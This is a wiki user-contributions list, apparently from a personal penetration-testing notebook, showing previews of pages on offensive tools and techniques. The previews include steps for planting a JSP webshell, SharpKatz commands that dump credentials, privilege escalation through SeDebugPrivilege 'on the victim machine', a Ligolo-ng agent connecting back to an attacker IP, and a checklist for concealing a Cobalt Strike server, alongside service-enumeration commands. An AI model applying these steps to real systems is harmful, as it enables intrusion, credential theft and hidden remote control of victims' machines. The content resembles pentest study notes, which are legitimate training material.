21 August 2023
- 05:2105:21, 21 August 2023 diff hist +107 Ligolo-Ng No edit summary current Tag: Visual edit
- 05:1905:19, 21 August 2023 diff hist +107 Ligolo-Ng No edit summary Tag: Visual edit
- 05:1405:14, 21 August 2023 diff hist +105 JSP Webshell No edit summary current Tag: Visual edit
- 05:1405:14, 21 August 2023 diff hist +2,612 N JSP Webshell Created page with "Links: https://github.com/SecurityRiskAdvisors/cmd.jsp === How to use (Bookmarklet method): === ===== 1: Upload cmd.jsp to a java web app server ===== How this happens is up to you. ===== 2: Browse to /[wherever you put it]/cmd.jsp ===== ===== 3: Use a bookmarklet to add javascript to the page ===== Add the code below as a link to your bookmarks bar and click it when you are on the cmd.jsp page. It will add the javascript which provides the user interface and client..." Tag: Visual edit
- 05:1105:11, 21 August 2023 diff hist +77 N PowerUp.ps1 Created page with "Links: https://rootrecipe.medium.com/advanced-powerup-ps1-usage-ad0f6d713a9f" current Tag: Visual edit
- 05:0905:09, 21 August 2023 diff hist +1,048 N SeDebugPrivilege Created page with "You can update update proc attribute list with this privilege and can elevate privileges. Use the module below to do that. ===== Module: ===== <syntaxhighlight lang="powershell"> https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1 </syntaxhighlight>Get the above ps1 on the victim machine. Then run:<syntaxhighlight lang="powershell"> import-module .\psgetsys.ps1 </syntaxhighlight>Find pid of a process that is privileged.<syntaxhighlight lang="powershell">..." current Tag: Visual edit
- 05:0305:03, 21 August 2023 diff hist +1,092 N SharpKatz Created page with "== Links == <syntaxhighlight lang="powershell"> https://github.com/b4rtik/SharpKatz </syntaxhighlight> == Usage == <syntaxhighlight lang="powershell"> #list Kerberos encryption keys SharpKatz.exe --Command ekeys #Retrive user credentials from Msv provider SharpKatz.exe --Command msv #Retrive user credentials from Kerberos provider SharpKatz.exe --Command kerberos #Retrive user credentials from Tspkg provider SharpKatz.exe --Command tspkg #Retrive user credentials fr..." current Tag: Visual edit
- 04:5804:58, 21 August 2023 diff hist +619 N Ligolo-Ng Created page with "== Usage: == Attacker:<syntaxhighlight lang="powershell"> sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert </syntaxhighlight>Victim:<syntaxhighlight lang="powershell"> ./agent -connect <attacker_IP>:11601 -ignore-cert </syntaxhighlight>Start the tunneling:<syntaxhighlight lang="powershell"> session 1 Start </syntaxhighlight>Add Listener:<syntaxhighlight lang="powershell"> listener_add --addr 0.0.0.0:1234 --to 127.0...." Tag: Visual edit
- 04:4704:47, 21 August 2023 diff hist +155 Mimikatz No edit summary current Tag: Visual edit
- 04:4504:45, 21 August 2023 diff hist +60 Active Directory No edit summary Tag: Visual edit
- 04:4104:41, 21 August 2023 diff hist +9 Active Directory No edit summary
- 04:4004:40, 21 August 2023 diff hist +22 Active Directory No edit summary
- 04:3804:38, 21 August 2023 diff hist +1,168 Active Directory No edit summary Tag: Visual edit
- 04:3404:34, 21 August 2023 diff hist +22 Active Directory No edit summary
16 July 2023
- 12:2912:29, 16 July 2023 diff hist −17 Whonix No edit summary current Tag: Visual edit
- 12:2812:28, 16 July 2023 diff hist +126 Whonix No edit summary Tag: Visual edit
- 12:2812:28, 16 July 2023 diff hist +454 N Whonix Created page with "== Use Kali on Whonix in Virtual Box == # <code>ifdown eth0</code> # <code>nano /etc/resolv.conf</code> # Replace the contents of <code>/etc/resolv.conf</code> with: <code>nameserver 10.152.152.10</code> # <code>nano /etc/network/interfaces</code> # Add the following lines to the end of <code>/etc/network/interfaces</code>: <code>iface eth0 inet static address 10.152.152.11 netmask 255.255.192.0 gateway 10.152.152.10</code> # <code>ifup eth0</code>" Tag: Visual edit
- 06:4806:48, 16 July 2023 diff hist +177 N VPS - Virtual Private Servers Created page with "== VPS - List == * Hetzner (https://www.hetzner.com/sb#sb-info) * crazyrdp (https://crazyrdp.com/) * privatealps (https://privatealps.net/en) * contabo (https://contabo.com/en)" current Tag: Visual edit
- 04:5504:55, 16 July 2023 diff hist +165 N Cobalt strike modifications checklist Created page with "* Modify Default Port * Replace SSL Certificate * Modify C2 Profile File [https://programmer.group/hiding-skills-of-cobaltstrike-server.html Hiding Cobalt Strike ]" current
9 July 2023
- 14:1914:19, 9 July 2023 diff hist +48 MySql No edit summary current
- 14:1714:17, 9 July 2023 diff hist +612 N MySql Created page with "<syntaxhighlight lang="powershell"> ## Connect to the MySQL server. There should not be a space between the '-p' flag, and the password. mysql -u <user> -p<password> -h <IP address> ## Show all databases. show databases; ## Select one of the existing databases. use <database>; ## Show all available tables in the selected database. show tables; ## Show all columns in the selected database. show columns from <table>; ## Show everything in the desired table. select..." Tag: Visual edit
8 July 2023
- 15:1915:19, 8 July 2023 diff hist +315 Snmp No edit summary current Tag: Visual edit
- 15:1815:18, 8 July 2023 diff hist +12 N Snmp Created page with "==COMMANDS==" Tag: Visual edit: Switched
- 15:1315:13, 8 July 2023 diff hist +110 N IMAPS / POP3S Created page with "Article for IMAPS / POP3S connections and commands https://www.atmail.com/blog/imap-101-manual-imap-sessions/" current Tag: Visual edit
- 13:3913:39, 8 July 2023 diff hist +101 SMTP No edit summary current Tag: Visual edit
- 13:3813:38, 8 July 2023 diff hist +12 N SMTP Created page with "==COMMANDS=="
- 13:1813:18, 8 July 2023 diff hist +1 DNS No edit summary current
- 13:1813:18, 8 July 2023 diff hist +247 DNS No edit summary
- 12:5112:51, 8 July 2023 diff hist +33 NFS →COMMANDS current Tag: Visual edit
- 12:4812:48, 8 July 2023 diff hist +13 FTP →COMMANDS current Tag: Visual edit
- 12:4112:41, 8 July 2023 diff hist +425 DNS No edit summary Tag: Visual edit
- 12:3912:39, 8 July 2023 diff hist +11 N DNS Created page with "==COMMAND==" Tag: Visual edit: Switched
- 12:3812:38, 8 July 2023 diff hist +41 NFS No edit summary Tag: Visual edit
- 12:3812:38, 8 July 2023 diff hist +233 N NFS Created page with "==COMMANDS== <code>showmount -e <FQDN/IP> Show available NFS shares. mount -t nfs <FQDN/IP>:/<share> ./target-NFS/ -o nolock Mount the specific NFS share.umount ./target-NFS umount ./target-NFS Unmount the specific NFS share.</code>" Tag: Visual edit: Switched
- 12:3712:37, 8 July 2023 diff hist +474 SMB →Basic Commands current Tag: Visual edit
- 12:3512:35, 8 July 2023 diff hist +6 FTP →COMMANDS Tag: Visual edit: Switched
- 12:3512:35, 8 July 2023 diff hist +1 FTP No edit summary
- 12:3412:34, 8 July 2023 diff hist +54 FTP No edit summary Tag: Visual edit
- 12:3312:33, 8 July 2023 diff hist +435 N FTP Created page with "-COMMANDS- ftp <FQDN/IP> Interact with the FTP service on the target. nc -nv <FQDN/IP> 21 Interact with the FTP service on the target. telnet <FQDN/IP> 21 Interact with the FTP service on the target. openssl s_client -connect <FQDN/IP>:21 -starttls ftp Interact with the FTP service on the target using encrypted connection. wget -m --no-passive ftp://anonymous:anonymous@<target> Download all available files on the target FTP server."
6 July 2023
- 11:2811:28, 6 July 2023 diff hist +1 Nmap No edit summary current
- 11:2811:28, 6 July 2023 diff hist +27 Nmap No edit summary
- 08:0808:08, 6 July 2023 diff hist +80 Nmap No edit summary
3 July 2023
- 13:5713:57, 3 July 2023 diff hist +9 Nmap No edit summary Tag: Visual edit
- 13:5613:56, 3 July 2023 diff hist +61 Nmap No edit summary Tag: Visual edit: Switched
- 13:5313:53, 3 July 2023 diff hist −27 Nmap No edit summary Tag: Visual edit: Switched
- 13:5213:52, 3 July 2023 diff hist +29 Nmap No edit summary Tag: Visual edit
- 13:5213:52, 3 July 2023 diff hist +34 N File:Nmap Scan.png No edit summary current
- 13:4713:47, 3 July 2023 diff hist +84 Nmap No edit summary Tag: Visual edit: Switched
- 13:3913:39, 3 July 2023 diff hist +12 Nmap No edit summary Tag: Visual edit
18 May 2023
- 13:3313:33, 18 May 2023 diff hist +4 Help →Transclusion